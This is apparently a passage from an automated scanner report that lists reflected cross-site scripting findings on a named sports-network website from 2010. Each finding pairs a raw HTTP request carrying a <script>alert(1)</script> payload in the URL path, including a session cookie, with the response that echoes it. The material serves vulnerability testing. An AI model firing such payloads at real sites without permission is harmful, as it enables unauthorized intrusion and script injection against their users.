GET /06/29/10/San-Diego-States-Top-5-Plays-of-the-Year/landing.html38a51<script>alert(1)</script>09a6ef307a1 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:15 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:15 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/06/29/10/San-Diego-States-Top-5-Plays-of-the-Year/landing.html38a51<script>alert(1)</script>09a6ef307a1"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 62a40<script>alert(1)</script>578abcaeca8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /07/13/10/Watch-The-UNLV-Rebels-Top-5-Plays-of-the/landing.html62a40<script>alert(1)</script>578abcaeca8 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:19 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/07/13/10/Watch-The-UNLV-Rebels-Top-5-Plays-of-the/landing.html62a40<script>alert(1)</script>578abcaeca8"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cdacd<script>alert(1)</script>2e4a0ae94f7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /08/05/10/ATM-Teams-Improving-img-srchttpthemtntvi/landing.htmlcdacd<script>alert(1)</script>2e4a0ae94f7 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:22 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/08/05/10/ATM-Teams-Improving-img-srchttpthemtntvi/landing.htmlcdacd<script>alert(1)</script>2e4a0ae94f7"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 78e95<script>alert(1)</script>709b1708fa6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /09/08/10/Excellent-Source-for-Breaking-News/landing.html78e95<script>alert(1)</script>709b1708fa6 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:16 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:16 GMT Content-Length: 800 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/09/08/10/Excellent-Source-for-Breaking-News/landing.html78e95<script>alert(1)</script>709b1708fa6"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e9f87<script>alert(1)</script>956c4f28043 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /09/14/10/Quality-Original-Programming/landing.htmle9f87<script>alert(1)</script>956c4f28043 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:21 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:21 GMT Content-Length: 794 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/09/14/10/Quality-Original-Programming/landing.htmle9f87<script>alert(1)</script>956c4f28043"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5dea3<script>alert(1)</script>65144c5fd53 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /09/18/10/FB-Rams-Lose-Third-Straight-31-10/landing.html5dea3<script>alert(1)</script>65144c5fd53 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:26 GMT Content-Length: 799 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/09/18/10/FB-Rams-Lose-Third-Straight-31-10/landing.html5dea3<script>alert(1)</script>65144c5fd53"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 350c4<script>alert(1)</script>db7827277fe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /09/23/10/An-Impressed-Viewer/landing.html350c4<script>alert(1)</script>db7827277fe HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:24 GMT Content-Length: 785 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/09/23/10/An-Impressed-Viewer/landing.html350c4<script>alert(1)</script>db7827277fe"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b2e7b<script>alert(1)</script>be6ca4e6195 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /10/13/10/ALL-22-Is-Alright/landing.htmlb2e7b<script>alert(1)</script>be6ca4e6195 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:29 GMT Content-Length: 783 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/10/13/10/ALL-22-Is-Alright/landing.htmlb2e7b<script>alert(1)</script>be6ca4e6195"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e464c<script>alert(1)</script>c1f0e0115f2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /10/27/10/Mountain-West-Football-Saturday-Comments/landing.htmle464c<script>alert(1)</script>c1f0e0115f2 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:28 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:28 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/10/27/10/Mountain-West-Football-Saturday-Comments/landing.htmle464c<script>alert(1)</script>c1f0e0115f2"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 29941<script>alert(1)</script>ddc32cdb769 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/20/10/FB-BYU-Becomes-Bowl-Eligible-After-Win-O/landing.html29941<script>alert(1)</script>ddc32cdb769 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:30 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:30 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/11/20/10/FB-BYU-Becomes-Bowl-Eligible-After-Win-O/landing.html29941<script>alert(1)</script>ddc32cdb769"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ba82c<script>alert(1)</script>99261d173b5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/20/10/FB-Wyoming-Shuts-Out-Rams-44-0-img-srcht/landing.htmlba82c<script>alert(1)</script>99261d173b5 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:44 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/11/20/10/FB-Wyoming-Shuts-Out-Rams-44-0-img-srcht/landing.htmlba82c<script>alert(1)</script>99261d173b5"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b5b2e<script>alert(1)</script>a1f78cc2a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/21/10/FB-Utah-Outlasts-Aztecs-38-34/landing.htmlb5b2e<script>alert(1)</script>a1f78cc2a HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:33 GMT Content-Length: 793 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/11/21/10/FB-Utah-Outlasts-Aztecs-38-34/landing.htmlb5b2e<script>alert(1)</script>a1f78cc2a"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 32f2a<script>alert(1)</script>cbbc0230f4e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/27/10/FB-SDSU-Blows-BY-UNLV-48-14-img-srchttpt/landing.html32f2a<script>alert(1)</script>cbbc0230f4e HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:35 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/11/27/10/FB-SDSU-Blows-BY-UNLV-48-14-img-srchttpt/landing.html32f2a<script>alert(1)</script>cbbc0230f4e"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6f9e2<script>alert(1)</script>882676cb943 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/27/10/FB-TCU-Finishes-Strong-Over-Lobos-66-17-/landing.html6f9e2<script>alert(1)</script>882676cb943 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:33 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/11/27/10/FB-TCU-Finishes-Strong-Over-Lobos-66-17-/landing.html6f9e2<script>alert(1)</script>882676cb943"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2ec75<script>alert(1)</script>e2f82d2f95e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/27/10/FB-Utah-Tops-BYU-17-16-img-srchttpthemtn/landing.html2ec75<script>alert(1)</script>e2f82d2f95e HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:35 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/11/27/10/FB-Utah-Tops-BYU-17-16-img-srchttpthemtn/landing.html2ec75<script>alert(1)</script>e2f82d2f95e"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3b510<script>alert(1)</script>53c7c3b0dd8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/27/10/MWC-Coach-Pressers-Week-13-img-srchttpth/landing.html3b510<script>alert(1)</script>53c7c3b0dd8 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:41 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/11/27/10/MWC-Coach-Pressers-Week-13-img-srchttpth/landing.html3b510<script>alert(1)</script>53c7c3b0dd8"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f93df<script>alert(1)</script>c6d3a4637f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/27/10/Todd-Christensen-The-End-of-an-Era-img-s/landing.htmlf93df<script>alert(1)</script>c6d3a4637f HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:42 GMT Content-Length: 805 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/11/27/10/Todd-Christensen-The-End-of-an-Era-img-s/landing.htmlf93df<script>alert(1)</script>c6d3a4637f"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 60386<script>alert(1)</script>d1ff7af33d5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/29/10/TCU-Accepts-Big-East-Invite/landing.html60386<script>alert(1)</script>d1ff7af33d5 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:45 GMT Content-Length: 793 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/11/29/10/TCU-Accepts-Big-East-Invite/landing.html60386<script>alert(1)</script>d1ff7af33d5"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4584b<script>alert(1)</script>902a97c3e2e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/01/10/MBK-CSU-Runs-by-Drake-78-67-img-srchttpt/landing.html4584b<script>alert(1)</script>902a97c3e2e HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:46 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:46 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/01/10/MBK-CSU-Runs-by-Drake-78-67-img-srchttpt/landing.html4584b<script>alert(1)</script>902a97c3e2e"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b1f1f<script>alert(1)</script>9fe85adca88 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/01/10/The-Mtn-Launches-in-Atlanta-Grows-Covera/landing.htmlb1f1f<script>alert(1)</script>9fe85adca88 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:41 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/01/10/The-Mtn-Launches-in-Atlanta-Grows-Covera/landing.htmlb1f1f<script>alert(1)</script>9fe85adca88"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a0d9d<script>alert(1)</script>e71bf1d2bf8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
